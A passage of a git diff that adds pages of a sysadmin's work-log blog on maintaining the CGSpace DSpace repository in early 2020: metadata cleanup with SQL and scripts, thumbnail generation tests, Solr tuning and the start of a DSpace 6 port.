+<li>Merged: <a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
+<li>Merged: <a href="https://github.com/AgriculturalSemantics/cg-core/pull/17">Add LICENSE file</a></li>
+<li>Merged: <a href="https://github.com/AgriculturalSemantics/cg-core/pull/18">Build main.css using npm build</a></li>
+<li>Approved a <a href="https://github.com/AgriculturalSemantics/cg-core/issues/14">wider scope for <code>cg.peer-reviewed</code></a> (renaming the field and using non-boolean values), but there is more discussion needed</li>
+</ul>
+</li>
+<li>I opened a new <a href="https://github.com/AgriculturalSemantics/cg-core/pull/24">pull request</a> on the cg-core repository validate and fix the formatting of the HTML files</li>
+<li>Create more issues for OpenRXV:
+<ul>
+<li>Based on Peter&rsquo;s feedback on the <a href="https://github.com/ilri/OpenRXV/issues/33">text for labels and tooltips</a></li>
+<li>Based on Peter&rsquo;s feedback for the <a href="https://github.com/ilri/OpenRXV/issues/35">export icon</a></li>
+<li>Based on Peter&rsquo;s feedback for the <a href="https://github.com/ilri/OpenRXV/issues/31">sort options</a></li>
+<li>Based on Abenet&rsquo;s feedback that <a href="https://github.com/ilri/OpenRXV/issues/34">PDF and Word exports are not working</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-22">2020-01-22</h2>
+<ul>
+<li>I tried to create a MaxMind account so I can download the GeoLite2-City database with a license key, but their server refuses to accept me:</li>
+</ul>
+<pre tabindex="0"><code>Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
+</code></pre><ul>
+<li>They started <a href="https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases/">limiting public access to the database in December, 2019 due to GDPR and CCPA</a>
+<ul>
+<li>This will be a problem in the future (see <a href="https://jira.lyrasis.org/browse/DS-4409">DS-4409</a>)</li>
+</ul>
+</li>
+<li>Peter sent me his corrections for the list of authors that I had sent him earlier in the month
+<ul>
+<li>There were encoding issues when I checked the file in vim and using Python-based tools, but OpenRefine was able to read and export it as UTF-8</li>
+<li>I will apply them on CGSpace and DSpace Test using my <code>fix-metadata-values.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct -d
+</code></pre><ul>
+<li>Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
+COPY 67314
+dspace=# \q
+$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],dc.contributor.author&#39;
+$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
+</code></pre><ul>
+<li>Peter asked me to send him a list of affiliations to correct
+<ul>
+<li>First I decided to export them and run the Unicode normalizations and syntax checks with csv-metadata-quality and re-import the cleaned up values:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, text_value as &#34;correct&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
+COPY 6170
+dspace=# \q
+$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
+$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -n
+</code></pre><ul>
+<li>I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:</li>
+</ul>
+<pre tabindex="0"><code>$ sleep 4h &amp;&amp; time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>Then I generated a new list for Peter:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
+COPY 6162
+</code></pre><ul>
+<li>Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author &ldquo;Hung, Nguyen&rdquo;
+<ul>
+<li>I generated a report for 2019 and 2020 with each and I see there are indeed ten more Handles in the results from L&amp;R:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E &#39;s/10568 ([0-9]+)/10568\/\1/&#39; | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
+$ grep -oE &#39;10568\/[0-9]+&#39; hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
+$ wc -l hung-nguyen-a*handles.txt
+  46 hung-nguyen-ares-handles.txt
+  56 hung-nguyen-atmire-handles.txt
+ 102 total
+</code></pre><ul>
+<li>Comparing the lists of items, I see that nine of the ten missing items were added less than twenty-four hours ago, and the other was added last week, so they apparently just haven&rsquo;t been indexed yet
+<ul>
+<li>I am curious to check tomorrow to see if they are there</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-23">2020-01-23</h2>
+<ul>
+<li>I checked AReS and I see that there are now 55 items for author &ldquo;Hung Nguyen-Viet&rdquo;</li>
+<li>Linode sent an alert that the outbound traffic rate of CGSpace (linode18) was high for several hours this morning around 5AM UTC+1
+<ul>
+<li>I checked the nginx logs this morning for the few hours before and after that using goaccess:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2020:0[12345678]&#34; | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>The top two hosts according to the amount of data transferred are:
+<ul>
+<li>2a01:7e00::f03c:91ff:fe9a:3a37</li>
+<li>2a01:7e00::f03c:91ff:fe18:7396</li>
+</ul>
+</li>
+<li>Both are on Linode, and appear to be the new and old ilri.org servers</li>
+<li>I will ask the web team</li>
+<li>Judging from the <a href="https://www.ilri.org/publications/trade-offs-related-agricultural-use-antimicrobials-and-synergies-emanating-efforts">ILRI publications site</a> it seems they are downloading the PDFs so they can generate higher-quality thumbnails:</li>
+<li>They are apparently using this Drupal module to generate the thumbnails: <code>sites/all/modules/contrib/pdf_to_imagefield</code></li>
+<li>I see some excellent suggestions in this <a href="https://www.imagemagick.org/discourse-server/viewtopic.php?t=21589">ImageMagick thread from 2012</a> that lead me to some nice thumbnails (default PDF density is 72, so supersample to 4X and then resize back to 25%) as well as <a href="https://duncanlock.net/blog/2013/11/18/how-to-create-thumbnails-for-pdfs-with-imagemagick-on-linux/">this blog post</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
+</code></pre><ul>
+<li>Here I&rsquo;m also explicitly setting the background to white and removing any alpha layers, but I could probably also just keep using <code>-flatten</code> like DSpace already does</li>
+<li>I did some tests with a modified version of above that uses uses <code>-flatten</code> and drops the sampling-factor and colorspace, but bumps up the image size to 600px (default on CGSpace is currently 300):</li>
+</ul>
+<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
+$ convert -flatten 10568-97925.pdf\[0\] 10568-97925.pdf.jpg
+$ convert -thumbnail x600 10568-97925-d288-lagrange.pdf.jpg 10568-97925-d288-lagrange-thumbnail.pdf.jpg
+$ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
+</code></pre><ul>
+<li>This emulate&rsquo;s DSpace&rsquo;s method of generating a high-quality image from the PDF and then creating a thumbnail</li>
+<li>I put together a proof of concept of this by adding the extra options to dspace-api&rsquo;s <code>ImageMagickThumbnailFilter.java</code> and it works</li>
+<li>I need to run tests on a handful of PDFs to see if there are any side effects</li>
+<li>The file size is about double the old ones, but the quality is very good and the file size is nowhere near ilri.org&rsquo;s 400KiB PNG!</li>
+<li>Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
+$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct
+$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
+</code></pre><h2 id="2020-01-26">2020-01-26</h2>
+<ul>
+<li>Add &ldquo;Gender&rdquo; to controlled vocabulary for CRPs (<a href="https://github.com/ilri/DSpace/pull/442">#442</a>)</li>
+<li>Deploy the changes on CGSpace and run all updates on the server and reboot it
+<ul>
+<li>I had to restart the <code>tomcat7</code> service several times until all Solr statistics cores came up OK</li>
+</ul>
+</li>
+<li>I spent a few hours writing a script (<a href="https://gist.github.com/alanorth/1c7c8b2131a19559e273fbc1e58d6a71">create-thumbnails</a>) to compare the default DSpace thumbnails with the improved parameters above and actually when comparing them at size 600px I don&rsquo;t really notice much difference, other than the new ones have slightly crisper text
+<ul>
+<li>So that was a waste of time, though I think our 300px thumbnails are a bit small now</li>
+<li><a href="https://www.imagemagick.org/discourse-server/viewtopic.php?t=14561">Another thread on the ImageMagick forum</a> mentions that you need to set the density, then read the image, then set the density again:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
+</code></pre><ul>
+<li>One thing worth mentioning was this syntax for extracting bits from JSON in bash using <code>jq</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ RESPONSE=$(curl -s &#39;https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams&#39;)
+$ echo $RESPONSE | jq &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
+&#34;/bitstreams/172559/retrieve&#34;
+</code></pre><h2 id="2020-01-27">2020-01-27</h2>
+<ul>
+<li>Bizu has been having problems when she logs into CGSpace, she can&rsquo;t see the community list on the front page
+<ul>
+<li>This last happened for another user in <a href="https://alanorth.github.io/cgspace-notes/2016-11/">2016-11</a>, and it was related to the Tomcat <code>maxHttpHeaderSize</code> being too small because the user was in too many groups</li>
+<li>I see that it is similar, with this message appearing in the DSpace log just after she logs in:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] &#39;: too many boolean clauses
+</code></pre><ul>
+<li>Now this appears to be a Solr limit of some kind (&ldquo;too many boolean clauses&rdquo;)
+<ul>
+<li>I changed the <code>maxBooleanClauses</code> for all Solr cores on DSpace Test from 1024 to 2048 and then she was able to see her communities&hellip;</li>
+<li>I made a <a href="https://github.com/ilri/DSpace/pull/443">pull request</a> and merged it to the <code>5_x-prod</code> branch and will deploy on CGSpace later tonight</li>
+<li>I am curious if anyone on the dspace-tech mailing list has run into this, so I will try to send a message about this there when I get a chance</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-28">2020-01-28</h2>
+<ul>
+<li>Generate a list of CIP subjects for Abenet:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.cip&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
+COPY 77
+</code></pre><ul>
+<li>Start looking over the IITA records from earlier this month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
+<ul>
+<li>Delete one duplicate, map one item from ILRI community</li>
+<li>The following items are duplicates or something (there is not enough metadata to tell for sure):
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/106682">https://dspacetest.cgiar.org/handle/10568/106682</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/106653">https://dspacetest.cgiar.org/handle/10568/106653</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/106694">https://dspacetest.cgiar.org/handle/10568/106694</a></li>
+</ul>
+</li>
+<li>This item doesn&rsquo;t exist in the journal, and Weed Science volume 55 was published in 2007, not 2003:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/106665">https://dspacetest.cgiar.org/handle/10568/106665</a></li>
+</ul>
+</li>
+<li>All items using <code>cg.journal.title</code> instead of <code>dc.source</code></li>
+<li>Several items were missing ISSN despite having a journal title</li>
+<li>Many items were missing DOIs, abstracts, etc</li>
+<li>I did some metadata enrichment by searching for the items and copying relevant data from journal pages</li>
+<li>I asked Bosede to try to do the same for the rest of the journal articles</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-29">2020-01-29</h2>
+<ul>
+<li>Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:</li>
+</ul>
+<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://www.doi.org%&#39;;
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://doi.org%&#39;;
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://dx.doi.org%&#39;;
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.youtube.com&#39;, &#39;https://www.youtube.com&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.youtube.com%&#39;;
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.slideshare.net&#39;, &#39;https://www.slideshare.net&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.slideshare.net%&#39;;
+</code></pre><ul>
+<li>I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &#34;id&#34;, text_value as &#34;dc.identifier.issn&#34; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
+COPY 23339
+</code></pre><ul>
+<li>Then, after spending two hours correcting 1,000 ISSNs I realized that I need to normalize the <code>text_lang</code> fields in the database first or else these will all look like changes due to the &ldquo;en_US&rdquo; and NULL, etc (for both ISSN and ISBN):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
+UPDATE 30454
+</code></pre><ul>
+<li>Then I realized that my initial PostgreSQL query wasn&rsquo;t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when <code>dspace metadata-import</code> sees it, the change will be removed and added, or added and removed, depending on the order it is seen!</li>
+<li>A better course of action is to select the distinct ones and then correct them using <code>fix-metadata-values.py</code>&hellip;</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.identifier.issn[en_US]&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
+COPY 2900
+</code></pre><ul>
+<li>I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later</li>
+<li>Then I applied 181 fixes for ISSNs using <code>fix-metadata-values.py</code> on DSpace Test and CGSpace (after testing locally):</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p &#39;fuuu&#39; -f &#39;dc.identifier.issn[en_US]&#39; -m 21 -t correct -d
+</code></pre><h2 id="2020-01-30">2020-01-30</h2>
+<ul>
+<li>About to start working on the DSpace 6 port and I&rsquo;m looking at commits that are in the not-yet-tagged DSpace 6.4:
+<ul>
+<li>[DS-4342] improve the performance of the collections/collection_id/items REST endpoint:
+<ul>
+<li>c2e6719fa763e291b81b2d61da2f8c758fe38ff3</li>
+</ul>
+</li>
+<li>[DS-4136] Improve OAI import performance for a large install:
+<ul>
+<li>3f81daf3d89b17ff4d08783ee9899e5a745851dc</li>
+<li>37004bbcf4ca3ef2a74ebc6e4774cb605884864e</li>
+</ul>
+</li>
+<li>DS-4110: fix issue in legacy id cleanup of stats records
+<ul>
+<li>3752247d6a4b83ee809cc9b197f34a8ff50b9e74</li>
+<li>e6004e57f0f2f3ce5f433647fe8a467b0176836b</li>
+<li>2fb3751c9adfe7311c6df43dbd51a41479480f5e</li>
+</ul>
+</li>
+<li>Fix DS-4066 by update all IDs to string type in schema:
+<ul>
+<li>f15cb33ab4272a3970572e608810de3076d541a3</li>
+</ul>
+</li>
+<li>DS-3914: Fix community defiliation:
+<ul>
+<li>19cc9719879cf69019acad72ee13915a4128e859</li>
+<li>b86a7b8d66608ee2bec67fb69b37e27c9a620aa3</li>
+</ul>
+</li>
+<li>[DS-3849] Default ID &lsquo;order by&rsquo; clause for other &lsquo;get items&rsquo; queries:
+<ul>
+<li>7b888fa558e5792cd780d1d6a7f75564f4da3bf9</li>
+<li>8d1aa33f7b9ea5a623e1ed13f139695671c598d4</li>
+</ul>
+</li>
+<li>[DS-3664] ImageMagick: Only execute &ldquo;identify&rdquo; on first page:
+<ul>
+<li>33ba419f3560639bff8ea002cdfc38345c0fea8d</li>
+</ul>
+</li>
+<li>DS-3658 Configure ReindexerThread disable reindex
+<ul>
+<li>1d2f10592ac2d86f28044749f34ac05347ea0e0a</li>
+<li>05959ef315d2a1670e4b59eee4db21f93ba238fa</li>
+<li>7253095b623069d7ef0a1a13cc5a21385d0878c9</li>
+</ul>
+</li>
+<li>[DS-3602] 6x Port: Incremental Update of Legacy Id fields in Solr Statistics:
+<ul>
+<li>184f2b2153479045fba6239342c63e7f8564b8b6</li>
+</ul>
+</li>
+<li>Dspace 6 ds 3545 mirage2: custom sitemap.xmap is ignored
+<ul>
+<li>71c68f2f54dead69329298810d0fecdf76b59c09</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>It&rsquo;s annoying that we have to target DSpace 6.3&hellip; I think I should totally cherry-pick these when I&rsquo;m done</li>
+<li>For now I just created a new DSpace repository and checked out the <code>dspace-6.3</code> tag and started diffing and copying changes over from our 5.8 repository</li>
+<li>There are some things I need to remember to check:
+<ul>
+<li><code>search.index</code> settings in DSpace 5&rsquo;s dspace.cfg (dunno where they are now)</li>
+<li><code>thumbnail-fallback-files.xml</code></li>
+</ul>
+</li>
+<li>The code currently lives in the <code>6_x-dev</code> branch</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-02/index.html b/docs/2020-02/index.html
new file mode 100644
index 000000000..9a55cc244
--- /dev/null
+++ b/docs/2020-02/index.html
@@ -0,0 +1,1329 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2020" />
+<meta property="og:description" content="2020-02-02
+
+Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+
+Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
+I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
+Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
+The code finally builds and runs with a fresh install
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-02/" />
+<meta property="article:published_time" content="2020-02-02T11:56:30+02:00" />
+<meta property="article:modified_time" content="2022-05-05T16:50:10+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2020"/>
+<meta name="twitter:description" content="2020-02-02
+
+Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+
+Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
+I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
+Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
+The code finally builds and runs with a fresh install
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-02/",
+  "wordCount": "7239",
+  "datePublished": "2020-02-02T11:56:30+02:00",
+  "dateModified": "2022-05-05T16:50:10+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-02/">
+
+    <title>February, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-02/">February, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-02-02T11:56:30+02:00">Sun Feb 02, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-02-02">2020-02-02</h2>
+<ul>
+<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+<ul>
+<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li>
+<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li>
+<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li>
+<li>The code finally builds and runs with a fresh install</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>Now we don&rsquo;t specify the build environment because site modification are in <code>local.cfg</code>, so we just build like this:</li>
+</ul>
+<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
+</code></pre><ul>
+<li>And it seems that we need to enable <code>pgcrypto</code> now (used for UUIDs):</li>
+</ul>
+<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace63
+dspace63=# CREATE EXTENSION pgcrypto;
+CREATE EXTENSION pgcrypto;
+</code></pre><ul>
+<li>I tried importing a PostgreSQL snapshot from CGSpace and had errors due to missing Atmire database migrations
+<ul>
+<li>If I try to run <code>dspace database migrate</code> I get the IDs of the migrations that are missing</li>
+<li>I delete them manually in psql:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
+</code></pre><ul>
+<li>Then I ran <code>dspace database migrate</code> and got an error:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace63/bin/dspace database migrate
+
+Database URL: jdbc:postgresql://localhost:5432/dspace63?ApplicationName=dspaceCli
+Migrating database to latest version... (Check dspace logs for details)
+Migration exception:
+java.sql.SQLException: Flyway migration error occurred
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:673)
